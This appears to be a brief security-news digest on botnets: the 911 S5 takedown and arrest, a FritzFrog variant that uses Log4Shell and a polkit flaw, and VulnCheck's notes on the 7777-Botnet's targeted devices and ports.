"Largest Botnet Ever" Disrupted. 911 S5's Alleged Mastermind Arrested. I guess he won't be getting much use of that Ferrari and Rolls Royce for a while...
Akamai provided details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability CVE-2021-44228 (10.0 critical). The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible. The malware also now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers. IOC provided.
🔗 https://www.akamai.com/blog/security-research/2024/feb/fritzfrog-botnet-new-capabilities-log4shell
VulnCheck wrote about 7777-Botnet with the following information:
7777-Botnet remains active, and VulnCheck used co-located services to theorize the botnet is infecting TP-Link, Xiongmai, and Hikvision devices using CVE-2017-7577, CVE-2018-10088, CVE-2022-45460, CVE-2021-36260, and/or CVE-2022-24355.
The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume.
The botnet doesn’t just start a service on port 7777. It also spins up a SOCKS5 server on port 11228.